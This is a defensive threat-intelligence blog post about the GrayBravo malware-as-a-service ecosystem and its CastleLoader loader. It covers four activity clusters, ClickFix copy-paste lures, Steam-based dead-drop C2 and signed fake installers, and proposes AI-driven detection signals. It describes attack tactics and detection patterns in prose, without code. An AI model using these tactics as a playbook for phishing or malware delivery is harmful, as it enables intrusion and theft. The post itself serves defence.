AI Detection Lessons From GrayBravo’s CastleLoader

A lot of security teams still treat malware campaigns as single, monolithic “threat actor operations.” GrayBravo (formerly TAG-150) is the opposite: a malware-as-a-service ecosystem where multiple operators run different campaigns, lures, and infrastructure—while sharing a common loader (CastleLoader) and downstream tooling (including CastleRAT and Matanbuchus).

That matters because it changes how you should defend. If your program is optimized to chase one set of indicators at a time, you’ll lose the thread. If you can model behaviors, clusters, and anomalies across email, endpoints, identity, and network—this is where AI in cybersecurity earns its keep.

Below is a practical, operations-focused read of the GrayBravo case: what the clusters tell us, how ClickFix turns user behavior into an exploit path, and what AI-powered detection and response should be doing differently in 2026.

GrayBravo is a “platform,” not a campaign

GrayBravo’s most important trait isn’t the malware family names. It’s the operating model: multiple distinct activity clusters were observed using CastleLoader with different victim profiles and tactics. That’s classic MaaS behavior—one core capability (the loader) and many “customers” (operators) running their own playbooks.

Here’s what that changes for defenders:

• You can’t rely on one cluster’s IoCs to stop the next one. Domains churn. Hosting shifts. The lure theme changes (logistics quotes one week, Booking.com the next).
• The shared layer is the detection opportunity. The loader behaviors, staging patterns, panel traits, and post-exploitation workflows create durable signals.
• Attribution matters less than clustering. Whether Cluster 2 and Cluster 3 share operators is interesting; what matters operationally is whether your controls can spot both.

In the “AI in Cybersecurity” series, I keep coming back to a simple stance: AI is most valuable when it learns the invariants in attacker behavior, not when it memorizes yesterday’s indicators. GrayBravo is a clean case study.

ClickFix: the social-engineering trick that breaks traditional controls

ClickFix attacks don’t “exploit” a vulnerability the way security teams like to imagine. They exploit the user’s willingness to follow instructions.

The pattern seen across GrayBravo-linked clusters is consistent:

1. A realistic lure (rate confirmation, guest verification, document signing).
2. A landing page that looks routine and time-sensitive.
3. A prompt that instructs the user to copy/paste and run a command.
4. The command pulls down an archive or script, launches it quietly (often via pythonw.exe), and drops CastleLoader (and then a second-stage payload).

This matters because many security stacks are still strongest at:

• blocking known malicious attachments
• scanning URLs against reputation feeds
• catching macro malware

ClickFix often slips between those layers by shifting the “execution step” into the user’s hands.

What AI should flag in a ClickFix chain

Answer first: AI detection should treat “user copy/paste command execution” as a high-risk behavioral sequence, especially when it’s preceded by an external lure.

Concrete signals to model:

• A browser session followed by a shell launch (powershell.exe, cmd.exe, mshta.exe) within a short time window
• Clipboard patterns that resemble staged commands (long one-liners, encoded blobs, download-and-execute sequences)
• Process trees where pythonw.exe appears unexpectedly on endpoints that don’t normally run Python
• A “decoy message” or fake completion dialog immediately after background execution (common in these campaigns)

This is where ML-based correlation helps more than static rules: individually, each event might be explainable; the sequence is the giveaway.

Four clusters, four lessons for AI-powered defense

Recorded Future’s analysis described four distinct CastleLoader activity clusters. Treat them as four training sets for your security analytics.

Cluster 1 (TAG-160): logistics lures + freight platforms = cyber-physical risk

Answer first: TAG-160 shows how threat actors specialize in one industry’s workflows and then weaponize them.

This cluster impersonated logistics firms, used logistics-themed phishing, and abused freight-matching platforms (DAT Freight & Analytics and Loadlink). The operational insight is bigger than malware delivery: logistics is a sector where access can translate into fraud, shipment rerouting, and real-world loss.

What’s distinctive here:

• Typosquatted and re-registered domains that look like real logistics companies
• Spoofed senders to mimic legitimate workflows
• Lures that reference authentic artifacts (rate confirmations, “Direct Port Entry” forms)
• Use of legitimate services (for example, file hosting and external platforms) to blend in

AI application: build industry-aware baselines.

If you support transportation/logistics clients, your detection models should understand normal rhythms:

• expected sender domains for dispatch, freight quotes, and broker comms
• normal access patterns to freight platforms
• typical document workflow tools used internally

Then look for deviations:

• first-time sender domains that are “near matches” to trusted brands
• new accounts or profile changes on freight platforms
• sudden spikes in outbound connections to newly registered domains following email interactions

Cluster 2 (TAG-161): Booking.com impersonation + “phishing ops tooling” at scale

Answer first: TAG-161 isn’t just phishing—it’s phishing operations engineering.

This cluster used Booking.com-themed lures and ClickFix, delivered CastleLoader and Matanbuchus, and—most telling—ran dedicated email/redirection management panels (with Russian-language titles like “Email Manager” and “Redirect and Email Manager”).

That tells you the operation is optimized for:

• generating unique redirect links at scale
• managing SMTP infrastructure and sending pools
• handling templates, logging, and proxy routing

AI application: detect the infrastructure behavior, not the brand lure.

Brand impersonation rotates endlessly. The redirection mechanics don’t.

What to model:

• high-entropy subdomain patterns used for per-target tracking
• unusual redirect chains that end in script download prompts
• outbound SMTP anomalies from endpoints that shouldn’t send mail
• proxy “fan-out” behavior tied to campaign infrastructure

Also, from a SOC process standpoint: if your team is still manually triaging every “Booking.com email,” you’re playing the attacker’s game. Your automation should collapse all brand-themed variants into one ClickFix/redirect cluster.

Cluster 3: Steam Community as a dead drop resolver

Answer first: Using a legitimate community site as a C2 resolver is a durability tactic, not a gimmick.

Cluster 3 used Booking.com-themed ClickFix, but a notable twist was using Steam Community profiles as a “dead drop” to resolve C2 domains. That gives attackers a flexible update channel without shipping new binaries.

AI application: legitimate internet services (LIS) need contextual monitoring.

Blanket-blocking Steam isn’t realistic for many orgs. Better approaches:

• Flag endpoints that access Steam Community and then initiate unusual outbound C2-like traffic shortly after
• Detect “resolver patterns” where an endpoint repeatedly polls a page and then pivots to new domains/IPs
• Use graph analytics: connect the sequence of (Steam profile → resolved domain → C2 IP) across endpoints

This is one of the strongest examples of why AI-based anomaly detection belongs in network security monitoring. Static allowlists for “popular sites” create blind spots.

Cluster 4: malvertising + fake signed installers

Answer first: Signed malware is a procurement problem as much as a detection problem.

Cluster 4 distributed CastleLoader via malvertising and fake software updates (impersonating tools like Zabbix and RVTools), including electronically signed MSI installers—sometimes with Extended Validation (EV) certificates.

If your users trust “signed = safe,” attackers will keep buying that trust.

AI application: trust scoring must include certificate and distribution context.

Practical signals:

• first-seen signer + first-seen file + downloaded from a non-standard source = high risk
• signed MSI that spawns script interpreters or drops unusual DLLs = high risk
• “fake GitHub repo” patterns: newly created repos, low history, binary releases with installer naming patterns

AI can help here by combining:

• reputation history (signer age, prevalence)
• behavior (process tree, network beacons)
• distribution path (ad click chains, referrers)

What CastleRAT’s infrastructure tells you about attacker maturity

CastleRAT communications showed redundant C2 behavior, including near-simultaneous connections to multiple servers and handshake variations. Operationally, redundancy means attackers expect takedowns and blocking—and they’ve planned around it.

Answer first: When you see deliberate C2 redundancy, incident response must prioritize containment speed over perfect attribution.

AI-powered response can help by:

• auto-grouping related C2 endpoints by protocol similarity and shared cryptographic markers (for example, repeated RC4 key clusters)
• detecting “multi-C2 fanout” as a sign of active control, not leftover beacon noise
• recommending containment actions based on observed playbooks (block + isolate + credential reset) rather than waiting for full malware classification

A practical detection blueprint (what I’d implement next)

If you want a concrete, low-drama plan that maps to GrayBravo-style MaaS threats, start here.

1) Build behavior-first detections for ClickFix

• Alert on browser → shell within 2–5 minutes after visiting an external link
• Flag clipboard-to-shell patterns (copy/paste burst + immediate interpreter execution)
• Watch for pythonw.exe execution on endpoints without sanctioned Python usage

2) Add “legitimate service anomaly” monitoring

• Create baselines for Paste sites, community platforms, and file-sharing services
• Alert on rare endpoints initiating those connections followed by new domain beacons

3) Treat newly registered domains as an investigation multiplier

• When email + newly registered domain + urgent lure language align, escalate automatically
• Use fuzzy matching to catch typosquats and re-registered brand domains

4) Make certificate trust contextual

• Score signed installers by signer prevalence, first-seen time, and execution behaviors
• Quarantine or require extra verification for low-prevalence EV-signed installers from ad-driven traffic

5) Cluster incidents, don’t just ticket them

• Build graphs connecting sender identity, landing pages, payload family, and C2 patterns
• Use AI to label clusters (logistics-themed ClickFix, Booking-themed redirect ops, malvertising installers) so the SOC sees campaigns—not noise

Snippet-worthy truth: MaaS is a scaling model. Your defense has to scale with clustering and automation, or you’ll be doing campaign triage forever.

Where this fits in the “AI in Cybersecurity” series

This GrayBravo case is a sharp reminder of what AI is really for in modern security operations: finding structure in chaos.

When attackers run multiple clusters, swap infrastructure quickly, and mix payloads (CastleLoader, CastleRAT, Matanbuchus, infostealers, RATs), the winning strategy isn’t “more indicators.” It’s better detection primitives—sequence analytics, anomaly detection, graph clustering, and automated containment decisions.

If you’re building or buying AI-powered security tooling, use GrayBravo as your test: can your system detect ClickFix behavior across different lures, correlate dead-drop resolving via legitimate services, and surface cluster-level insights fast enough to stop the next wave?

The next question to ask your team is simple: are you still defending endpoints one alert at a time, or are you defending the business by disrupting attacker workflows?